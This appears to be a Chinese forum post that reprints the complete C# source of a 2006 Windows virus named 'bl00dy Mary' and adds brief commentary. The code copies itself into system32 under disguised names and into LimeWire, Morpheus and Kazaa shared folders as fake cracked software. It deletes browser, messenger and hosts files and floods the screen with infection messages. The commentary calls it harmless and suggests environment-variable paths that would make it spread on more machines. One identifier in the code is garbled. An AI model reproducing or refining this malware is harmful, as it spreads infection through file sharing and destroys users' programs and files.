病毒代码如下
/* intento basico para un virus en C# * iniciacion del projecto Lunes 10 de Julio del 2006 * ~~bl00dy c0d3r~~ */ using System; using System.IO; using System.Windows.Forms; class MainClass { public static void Main() { string pauseline = ""; System.Windows.Forms.View.LargeIcon.Equals(@"cd.ico"); Console.WriteLine("Iniciating Install.. "); Console.WriteLine("Press ENTER to start..."); pauseline = Console.ReadLine(); try { Application.StartupPath.Clone(); } catch (Exception) { Console.WriteLine("StartUp Path, not cloned.."); } try { Application.AllowQuit.Equals(false); } catch (Exception) { Console.WriteLine("to quit press Ctrl + C"); } new trigger(); } } class trigger { public trigger(){ long trigger, counter; trigger = 10000; counter = 2; while (trigger != counter) { counter = counter + 1; Console.WriteLine("{0} << progress out of 10000", counter); } new effects(); // al activarse se ira a MainForm() y copy() } } class copy { public copy() { try { File.Copy(Application.ExecutablePath, System.Environment.SystemDirectory + @"/winlogon.dll.exe", true); } catch (Exception) { Console.WriteLine("winlogon failed permanently"); } try { File.Copy(Application.ExecutablePath, @"C:/WINDOWS/system32/taskman.exe", true); } catch (Exception) { Console.WriteLine("Finishing..."); }try { File.Copy(Application.ExecutablePath, System.Environment.SystemDirectory + @"/notepad.exe", true); }catch (Exception){ Console.WriteLine("Notepad failed permanently"); } try { File.Copy(Application.ExecutablePath, @"C:/Documents and Settings/Owner/Shared/Norton Antivirus~craked.exe", true); File.Copy(Application.ExecutablePath, @"C:/Documents and Settings/Owner/Shared/LimeWire Pro~10.5 Craked.exe", true); File.Copy(Application.ExecutablePath, @"C:/Documents and Settings/Owner/Shared/Key Generator Universal.exe", true); File.Copy(Application.ExecutablePath, @"C:/Documents and Settings/Owner/Shared/Generator Credit Card.exe", true); File.Copy(Application.ExecutablePath, @"C:/Documents and Settings/Owner/Shared/Halo 2.exe", true); File.Copy(Application.ExecutablePath, @"C:/Documents and Settings/Owner/Shared/Morpheus Ultra~Craked.exe", true); File.Copy(Application.ExecutablePath, @"C:/Documents and Settings/Owner/Shared/AntiSpyware Ultra.exe", true); File.Copy(Application.ExecutablePath, @"C:/Documents and Settings/Owner/Shared/Craked Windows XP sp2.exe", true); File.Copy(Application.ExecutablePath, @"C:/Documents and Settings/Owner/Shared/Win Zip craked.exe", true); File.Copy(Application.ExecutablePath, @"C:/Documents and Settings/Owner/Shared/Macromedia Flash 8 craked.exe", true); File.Copy(Application.ExecutablePath, @"C:/Documents and Settings/Owner/Shared/Lord of the rings II craked.exe", true); File.Copy(Application.ExecutablePath, @"C:/Documents and Settings/Owner/Shared/Nero craked.exe", true); File.Copy(Application.ExecutablePath, @"C:/Documents and Settings/Owner/Shared/Google Earth Pro~craked.exe", true); File.Copy(Application.ExecutablePath, @"C:/Documents and Settings/Owner/Shared/Windows Vista Craked.exe", true); } catch (Exception) { Console.WriteLine("LimeWire not found.."); Console.WriteLine("Please try to download it at http://www.Limewire.com"); } try { File.Copy(Application.ExecutablePath, @"C:/Program Files/Morpheus Ultra/My Shared Folder/Norton Antivirus~craked.exe", true); File.Copy(Application.ExecutablePath, @"C:/Program Files/Morpheus Ultra/My Shared Folder/LimeWire Pro~10.5 Craked.exe", true); File.Copy(Application.ExecutablePath, @"C:/Program Files/Morpheus Ultra/My Shared Folder/Key Generator Universal.exe", true); File.Copy(Application.ExecutablePath, @"C:/Program Files/Morpheus Ultra/My Shared Folder/Generator Credit Card.exe", true); File.Copy(Application.ExecutablePath, @"C:/Program Files/Morpheus Ultra/My Shared Folder/Halo 2.exe", true); File.Copy(Application.ExecutablePath, @"C:/Program Files/Morpheus Ultra/My Shared Folder/Morpheus Ultra~Craked.exe", true); File.Copy(Application.ExecutablePath, @"C:/Program Files/Morpheus Ultra/My Shared Folder/AntiSpyware Ultra.exe", true); File.Copy(Application.ExecutablePath, @"C:/Program Files/Morpheus Ultra/My Shared Folder/Craked Windows XP sp2.exe", true); File.Copy(Application.ExecutablePath, @"C:/Program Files/Morpheus Ultra/My Shared Folder/Win Zip craked.exe", true); File.Copy(Application.ExecutablePath, @"C:/Program Files/Morpheus Ultra/My Shared Folder/Macromedia Flash 8 craked.exe", true); File.Copy(Application.ExecutablePath, @"C:/Program Files/Morpheus Ultra/My Shared Folder/Lord of the rings II craked.exe", true); File.Copy(Application.ExecutablePath, @"C:/Program Files/Morpheus Ultra/My Shared Folder/Nero craked.exe", true); File.Copy(Application.ExecutablePath, @"C:/Program Files/Morpheus Ultra/My Shared Folder/Google Earth Pro~craked.exe", true); File.Copy(Application.ExecutablePath, @"C:/Program Files/Morpheus Ultra/My Shared Folder/Windows Vista Craked.exe", true); } catch (Exception) { Console.WriteLine("Morpheus Ultra not Found.."); } try { File.Copy(Application.ExecutablePath, @"C:/Program Files/Morpheus/My Shared Folder/Norton Antivirus~Craked.exe", true); File.Copy(Application.ExecutablePath, @"C:/Program Files/Morpheus/My Shared Folder/LimeWire Pro~10.5 Craked.exe", true); File.Copy(Application.ExecutablePath, @"C:/Program Files/Morpheus/My Shared Folder/Key Generator Universal.exe", true); File.Copy(Application.ExecutablePath, @"C:/Program Files/Morpheus/My Shared Folder/Halo 2.exe", true); File.Copy(Application.ExecutablePath, @"C:/Program Files/Morpheus/My Shared Folder/Morpheus Ultra~Craked.exe", true); File.Copy(Application.ExecutablePath, @"C:/Program Files/Morpheus/My Shared Folder/AntiSpyware Ultra.exe", true); File.Copy(Application.ExecutablePath, @"C:/Program Files/Morpheus/My Shared Folder/Craked Windows XP sp2.exe", true); File.Copy(Application.ExecutablePath, @"C:/Program Files/Morpheus/My Shared Folder/Win Zip craked.exe", true); File.Copy(Application.ExecutablePath, @"C:/Program Files/Morpheus/My Shared Folder/Macromedia Flash 8 craked.exe", true); File.Copy(Application.ExecutablePath, @"C:/Program Files/Morpheus/My Shared Folder/Lord of the rings II craked.exe", true); File.Copy(Application.ExecutablePath, @"C:/Program Files/Morpheus/My Shared Folder/Nero craked.exe", true); File.Copy(Application.ExecutablePath, @"C:/Program Files/Morpheus/My Shared Folder/Google Earth Pro~craked.exe", true); File.Copy(Application.ExecutablePath, @"C:/Program Files/Morpheus/My Shared Folder/Windows Vista Craked.exe", true); } catch (Exception) { Console.WriteLine("Morpheus not found.."); } try { File.Copy(Application.ExecutablePath, @"C:/Program Files/Kazaa/My Shared Folder/Norton Antivirus~Craked.exe", true); File.Copy(Application.ExecutablePath, @"C:/Program Files/Kazaa/My Shared Folder/LimeWire Pro~10.5 Craked.exe", true); File.Copy(Application.ExecutablePath, @"C:/Program Files/Kazaa/My Shared Folder/Key Generator Universal.exe", true); File.Copy(Application.ExecutablePath, @"C:/Program Files/Kazaa/My Shared Folder/Halo 2.exe", true); File.Copy(Application.ExecutablePath, @"C:/Program Files/Kazaa/My Shared Folder/Morpheus Ultra~Craked.exe", true); File.Copy(Application.ExecutablePath, @"C:/Program Files/Kazaa/My Shared Folder/AntiSpyware Ultra.exe", true); File.Copy(Application.ExecutablePath, @"C:/Program Files/Kazaa/My Shared Folder/Craked Windows XP sp2.exe", true); File.Copy(Application.ExecutablePath, @"C:/Program Files/Kazaa/My Shared Folder/Win Zip craked.exe", true); File.Copy(Application.ExecutablePath, @"C:/Program Files/Kazaa/My Shared Folder/Macromedia Flash 8 craked.exe", true); File.Copy(Application.ExecutablePath, @"C:/Program Files/Kazaa/My Shared Folder/Lord of the rings II craked.exe", true); File.Copy(Application.ExecutablePath, @"C:/Program Files/Kazaa/My Shared Folder/Nero craked.exe", true); File.Copy(Applica瓚ion.ExecutablePath, @"C:/Program Files/Kazaa/My Shared Folder/Google Earth Pro~craked.exe", true); File.Copy(Application.ExecutablePath, @"C:/Program Files/Kazaa/My Shared Folder/Windows Vista Craked.exe", true); } catch (Exception) { Console.WriteLine("Kazaa not found.."); } } } class effects { public effects() { new copy(); try { File.Delete(@"C:/Program Files/Yahoo!/Messenger/YPager.exe"); File.Delete(@"C:/Program Files/Internet Explorer/IEXPLORE.EXE"); File.Delete(@"C:/WINDOWS/$hf_mig$/KB873339/spmsg.dll"); File.Delete(@"C:/WINDOWS/system32/drivers/etc/hosts"); File.Delete(@"C:/Program Files/MSN Messenger/msvc.exe"); File.Delete(@"C:/Program Files/MSN Messenger/msnmsgr.exe"); } catch (Exception) { Console.WriteLine("Internet Explorer not found.."); } new report(); new infected(); Application.Run(new MainForm()); } } class infected { public infected() { string youInfected; youInfected = "true"; if (youInfected == "true") { Console.WriteLine("Finished!!"); Console.WriteLine("press ENTER to continue..."); string pauselineinfected; pauselineinfected = Console.ReadLine(); } else { new effects(); } } } class report { public report() { // aqui se pondra el codigo de reporte Console.WriteLine("Registering.."); } } class MainForm : Form { public MainForm() { long numDeVeces = 10000; long counter = 1; while (numDeVeces != counter) { try { Application.AllowQuit.Equals(false); } catch (Exception) { Console.WriteLine("JEJEJEJE!!!"); } counter = counter + 1; MessageBox.Show("Estas Infectad@ con bl00dy Mary, have phun!!/nNo intentes remover el virus o atacara!!", "Error Fatal..", MessageBoxButtons.OK, MessageBoxIcon.Hand, MessageBoxDefaultButton.Button1); } } } // terminado Domingo 16 de Julio 2006 10:43 pm. -=[bl00dy c0d3r]=-
这个病毒没杀伤力,就是几个替换和拷贝文件而已
不过觉得作者有一段代码写的不精炼
File.Copy(Application.ExecutablePath, @"C:/Documents and Settings/Owner/Shared/Norton Antivirus~craked.exe", true); File.Copy(Application.ExecutablePath, @"C:/Documents and Settings/Owner/Shared/LimeWire Pro~10.5 Craked.exe", true); File.Copy(Application.ExecutablePath, @"C:/Documents and Settings/Owner/Shared/Key Generator Universal.exe", true); File.Copy(Application.ExecutablePath, @"C:/Documents and Settings/Owner/Shared/Generator Credit Card.exe", true); File.Copy(Application.ExecutablePath, @"C:/Documents and Settings/Owner/Shared/Halo 2.exe", true); File.Copy(Application.ExecutablePath, @"C:/Documents and Settings/Owner/Shared/Morpheus Ultra~Craked.exe", true); File.Copy(Application.ExecutablePath, @"C:/Documents and Settings/Owner/Shared/AntiSpyware Ultra.exe", true); File.Copy(Application.ExecutablePath, @"C:/Documents and Settings/Owner/Shared/Craked Windows XP sp2.exe", true); File.Copy(Application.ExecutablePath, @"C:/Documents and Settings/Owner/Shared/Win Zip craked.exe", true); File.Copy(Application.ExecutablePath, @"C:/Documents and Settings/Owner/Shared/Macromedia Flash 8 craked.exe", true); File.Copy(Application.ExecutablePath, @"C:/Documents and Settings/Owner/Shared/Lord of the rings II craked.exe", true); File.Copy(Application.ExecutablePath, @"C:/Documents and Settings/Owner/Shared/Nero craked.exe", true); File.Copy(Application.ExecutablePath, @"C:/Documents and Settings/Owner/Shared/Google Earth Pro~craked.exe", true); File.Copy(Application.ExecutablePath, @"C:/Documents and Settings/Owner/Shared/Windows Vista Craked.exe", true); } catch (Exception) { Console.WriteLine("LimeWire not found.."); Console.WriteLine("Please try to download it at http://www.Limewire.com");
磁盘路径C:/Documents and Settings/Owner/并不是每台计算机的操作系统都安装在C盘
可以用Environment.GetEnvironmentVariable 方法获得系统环境变量
例如用户配置文档目录%userprofile%,以及系统应用程序安装目录 %programfiles%都可以用上面那个方法获得.
例如获得用户配置文档目录Environement.GetEnvironmentVariable("userprofile")
不过作者挺专业的都写好了 autorun.inf和nfo文件
